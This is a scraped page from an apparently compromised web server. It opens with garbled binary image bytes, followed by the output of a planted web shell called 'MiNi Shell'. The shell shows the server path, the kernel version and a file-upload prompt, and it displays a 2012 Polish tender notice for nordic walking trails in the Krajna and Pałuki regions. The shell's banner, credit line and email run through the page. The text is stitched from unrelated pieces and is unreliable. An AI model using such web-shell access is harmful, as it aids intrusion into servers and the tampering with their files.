JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121119/458140-N-2012.html

<p class="kh_header"><b>Sępólno Krajeńskie: Przetarg nieograniczony na wykonanie projektu technicznego przebiegu tras nordic walking, wyznaczenie przebiegu tras nordic walking w terenie na obszarze  partnerskich Lokalnych Grup Działania (LGD)</b><br>
<b>Numer ogłoszenia: 458140 - 2012; data zamieszczenia: 19.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stowarzyszenie Nasza Krajna , ul. T. Kościuszki 11, 89-400 Sępólno Krajeńskie, woj. kujawsko-pomorskie, tel. 52 3881340.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.naszakrajna.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na wykonanie projektu technicznego przebiegu tras nordic walking, wyznaczenie przebiegu tras nordic walking w terenie na obszarze  partnerskich Lokalnych Grup Działania (LGD).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu technicznego przebiegu tras nordic walking, wyznaczenie przebiegu tras  nordic walking oraz opracowanie materiału informacyjnego o trasach w terenie na obszarze partnerskich LGD tj.: Stowarzyszenia Lokalna Grupa Działania Nasza Krajna z siedzibą w Sępólnie Krajeńskim (gminy: Sępólno Krajeńskie, Więcbork, Sośno), Stowarzyszenia Partnerstwo dla Krajny i Pałuk z s. w Nakle nad Notecią (gminy: Mrocza, Nakło nad Notecią, Kcynia, Sadki, Szubin), Lokalnej Grupy Działania Pałuki - Wspólna Sprawa z s. w Żninie (gminy: Gąsawa, Rogowo, Łabiszyn i Żnin) oraz Lokalnej Grupy Działania Bory Tucholskie z s. w Tucholi (gminy: Cekcyn, Gostycyn, Kęsowo, Lniano, Lubiewo, Osie, Śliwice, Świekatowo, Tuchola). ETAP I - WYKONANIE PROJEKTU TECHNICZNEGO PRZEBIEGU TRAS 
NAZWA LGD 	PLANOWANA LICZBA TRAS DO ZAPROJEKTOWANIA 	MAX. LICZBA KILOMETRÓW TRAS NA OBSZARZE DANEGO LGD (ŁĄCZNIE) 	DODATKOWA INFRASTRUKTURA TURYSTYCZNA NA TRASACH
			RODZAJ INFRASTRUKTURY	ILOŚĆ LICZBA
Stowarzyszenie Lokalna Grupa Działania Nasza Krajna 	3	28	Wiata turystyczna 	3
			Stoły drewniane 	3
			Ławki drewniane bez oparcia 	6
			Tablica  informacyjna 	3
Lokalna Grupa Działania Bory Tucholskie	8	100	Wiata turystyczna 	6
			Stoły drewniane 	6
			Ławki drewniane bez oparcia 	12
			Tablica  informacyjna 	8
Lokalna Grupa Działania Pałuki - Wspólna Sprawa	5	35	Wiata turystyczna 	7
			Stoły drewniane 	7
			Ławki drewniane bez oparcia 	16
			Tablica  informacyjna 	5
Stowarzyszenie Partnerstwo dla Krajny i Pałuk 	5	50	Wiata turystyczna 	5
			Stoły drewniane 	5
			Ławki drewniane bez oparcia 	10
			Tablica  informacyjna 	5
 
ETAP I - ZAKRES PRAC 
1) uzgodnienie z poszczególnymi LGD oraz samorządami wstępnego projektu przebiegu tras,
2) weryfikacja w terenie wstępnego projektu przebiegu tras pod kątem przydatności 
dla uprawiania nordic walking,
3) wytyczenie przebiegu tras w oparciu o weryfikację terenową i formalną, 
4) ewentualne wspólne ze zleceniodawcą i włodarzami terenów ustalenie rozwiązania alternatywnego;
5) ustalenie właścicieli/zarządców terenu w odniesieniu do wszystkich działek przez które przebiega trasa oraz współpraca z przedstawicielami zleceniodawcy w zakresie prac formalno-prawnych,
6) przedstawienie wytyczonych tras  podmiotom zarządzającym terenem oraz zleceniodawcy w celu zatwierdzenia ich przebiegu,
7) wykonanie pomiarów długości i przebiegu zatwierdzonych tras urządzeniem GPS,
8) wykonanie projektu technicznego tras NW, tj.:
a) wykonanie kilometrażowego opisu przebiegu każdej z tras, 
b) oznaczenie przebiegu tras NW na mapie w skali odpowiadającej obszarowi danej LGD (w formie papierowej i elektronicznej - ( formacie mapy tif / 300dpi))
c) oznaczenie na kilometrażowym opisie przebiegu tras oraz na mapie rozmieszczenia urządzeń niezbędnych do oznakowania tras (tablice informacyjne, słupy ze znakami malowanymi, kierunkowskazy, drogowskazy 
i inne) wraz z podaniem ilości tych urządzeń (specyfikacją),
d) oznakowanie  zostanie rozmieszczone według następujących zasad: 
- drogowskaz trasy o wymiarach: szer. 150mm, długość 450mm, w tym strzałka kierunkowa 110mm, na której umieszczono kolor trasy (na grocie), zielone logo przedstawiające wizerunek postaci z kijkiem (w lewej części drogowskazu) 
i informację o miejscu docelowym (końcu trasy)  wraz z odległością do końca trasy;
- znak na trasie ma na celu wskazać idącemu z kijkami właściwy kierunek marszu i potwierdzić słuszność wyboru drogi tak, aby idący nie musiał zatrzymywać się ani niepotrzebnie zwalniać tempa marszu; 
-znak powinien być umieszczony w widocznym miejscu, najlepiej 
na kontrastującym tle. Na trasach bez rozwidleń i skrzyżowań znaki powinny być umieszczone w odległości nie większej niż 200 m jeden od drugiego;
- przejście trasy przez rozwidlenie bądź skrzyżowanie dróg powinno być oznakowane w taki sposób, aby znak potwierdzający wybór kierunku umieszczony był tuż przed lub na rozwidleniu bądź skrzyżowaniu, a także tuż po wejściu w wybraną drogę w celu upewnienia maszerującego, że wybrał prawidłowy kierunek marszu;
- w przypadku wspólnego odcinka przebiegu dwóch lub więcej tras dopuszcza się użycie znaku podstawowego z kilkoma poprzecznymi paskami w kolorach biegnących razem tras w dolnej części znaku;
- tablice informacyjne i drogowskazy powinny być ustawione na początku (końcu) trasy nordic walking. Drogowskazy powinny być również umieszczane w węzłach tras i dróg;
- znaki powinny być malowane wysokiej jakości wodoodpornymi i trwałymi farbami lub też umieszczane w postaci gotowych elementów, wykonanych 
z trwałych i odpornych na warunki atmosferyczne materiałów, a także być mocowane do podłoża w sposób trwały;
- podczas znakowania należy usunąć wszelkie przeszkody powodujące zasłonięcie znaku dla idącego z kijkami (chwasty, gałęzie drzew, krzaki itp.).
e) zakwalifikowanie wytyczonych tras pod względem stopnia trudności uprawiania nordic walking; sporządzenie profilu wysokości tras,
f) opracowanie i zatwierdzenie projektów stałej organizacji ruchu (w przypadkach, 
w których będzie to niezbędne).
9) Opracowana dokumentacja zostanie przekazana w formie papierowej (w 2 egz. dla każdej LGD w części dotyczącej danej LGD) oraz elektronicznej w wersji edytowalnej (po 2 płyty CD/DVD dla każdej LGD w części dotyczącej danej LGD).
ETAP I - Termin realizacji: do 30.06.2013 r.

ETAP II - WYZNACZENIE PRZEBIEGU TRAS NORDIC WALKING W TERENIE ORAZ OPRACOWANIE  MATERIAŁU INFORMACYJNEGO  O TRASACH NORDIC WALKING
1. Wyznaczenie przebiegu tras nordic walking w terenie - zakres prac :
1.1 Wykonanie i ustawienie oznakowania według projektu technicznego tras wykonanego i zaakceptowanego w Etapie I.
1.2 Wykonanie i montaż drogowskazów, znaków kierunkowych itp., malowanie znaków zgodnie z projektem tras wykonanym w ramach Etapu I.
1.3 Zaprojektowanie, wykonanie i montaż infrastruktury turystycznej (ław, wiat, stołów, tablic informacyjnych).
1.4 Sporządzenie dokumentacji fotograficznej wytyczonych i oznakowanych tras (min. 20 zdjęć z każdej z tras, min. 1 MB każde) do wykorzystania na wszystkich polach eksploatacji.
1.5 Kwalifikacja wytyczonych tras oraz ich opis pod kątem stopnia trudności 
i możliwości treningowych nordic walking.
1.6 Sporządzenie szczegółowego opisu przebiegu tras w terenie w odniesieniu 
do charakterystycznych punktów, dróg, ulic i obiektów.
1.7 Opracowanie materiału informacyjnego w formie elektronicznej ( mapa i opisy dla poszczególnych LGD) i udostępnienie materiału w formie linku zamieszczonego na serwerze Oferenta.
1.8 Udostępnienie materiału informacyjnego w formie plików Word, PDF oraz 
w programie Corel (mapa) do użytku Zamawiającego oraz publikacji 
we fragmentach lub w całości, w tym na stronach internetowych.
1.9 Wykonawca w realizacji zamówienia jest obowiązany do stosowania się 
do zapisów i wytycznych Księgi znaku marki Programu Rozwoju Obszarów Wiejskich na lata 2007 -2013. 
1.10 Przeniesienie na Zamawiającego autorskich praw majątkowych do wykonanego materiału do wykorzystania w całości lub części na wszystkich polach eksploatacji. 

2. PARAMETRY INFRASTRUKTURY TURYSTYCZNEJ 
Lp.	Rodzaj infrastruktury	Opis/Parametry
I.		Wiata turystyczna 	Wiata turystyczna z asymetrycznym dachem dwuspadowym (przybliżony wymiar zadaszenia - wysokość: ok. 280 cm, długość: około 400cm, szerokość: około 350cm; wykonana z drewna  zaimpregnowanego ciśnieniowo, słupy nośne ustabilizowane w gruncie i zabetonowane
II.		Stoły drewniane	Stół z drewna zaimpregnowanego ciśnieniowo, dł. 120-150cm, szer. 60cm. Stół trwale powiązany z gruntem w sposób uniemożliwiający jego przemieszczanie
III.		Ławki drewniane bez oparcia 	Ławka bez oparcia z drewna zaimpregnowanego ciśnieniowo, dł. 120-150cm, szer. 30cm
Ławka trwale powiązana z gruntem, w sposób uniemożliwiający jej przemieszczanie
IV.		Tablice informacyjne 	Wym. 150x100cm na dwóch  drewnianych słupach z drewnianym obramowaniem; płyta wykonana z materiału typu Dibond, wraz 
z projektem obejmującym informacje o projekcie i Partnerach projektu, na której znajduje się schematyczna mapa przebiegu trasy wraz 
z wykresem odległości i przewyższeń oraz z zaznaczonymi punktami godnymi uwagi turysty. Tablica informacyjna charakteryzuje również stopień trudności trasy.  
ETAP II - Termin realizacji: do 30.06.2014 r.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.11.27.20-8, 79.34.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia 
na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz dokumentów składanych przez wykonawcę 
w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy. 
Warunek zostanie spełniony w przypadku wykazania przez Wykonawcę posiadania wiedzy i doświadczenia, poprzez:
a) wykonanie przez Wykonawcę w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, przynajmniej jednego projektu technicznego przebiegu tras nordic walking o łącznej długości co najmniej 10 km oraz potwierdzenie, że w/w usługi zostały wykonane należycie.
b) wykonanie (wyznaczenie) przez Wykonawcę przebiegu tras nordic walking o wartości brutto nie mniejszej niż 50.000,00 zł oraz potwierdzenie, że w/w prace zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia 
na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia 
na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty - załącznik nr 1 do SIWZ;
2. pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku do treści oferty w zakresie:
1) terminu realizacji zamówienia, 
2) warunków płatności, w tym również zmiany terminów płatności, 
3) podwykonawców oraz zakresu prac im powierzonych, 
4) ustawowej zmiany stawki podatku VAT,
5) zmniejszenia ilości kilometrów (wykonania projektu technicznego przebiegu tras oraz wyznaczenia przebiegu tras).
Warunkiem wprowadzenia zmian w umowie jest pisemne zwrócenie się o wyrażenie zgody jednej ze stron na dokonanie zmiany w umowie z podaniem uzasadnienia faktycznego oraz wyrażenie zgody drugiej strony - dot. pkt 1-4. Warunkiem wprowadzenia zmian w umowie dot. pkt 5 jest ilość faktycznie zaprojektowanych i wykonanych kilometrów przebiegu trasy. Wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności takich zmian</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.naszakrajna.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> LGD Nasza Krajna przy ul. T. Kościuszki 11; 89-400 Sępólno Krajeńskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2012 godzina 14:30, miejsce: LGD Nasza Krajna przy ul. T. Kościuszki 11; 89-400 Sępólno Krajeńskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Europejski Fundusz Rolny na rzecz Rozwoju Obszarów Wiejskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com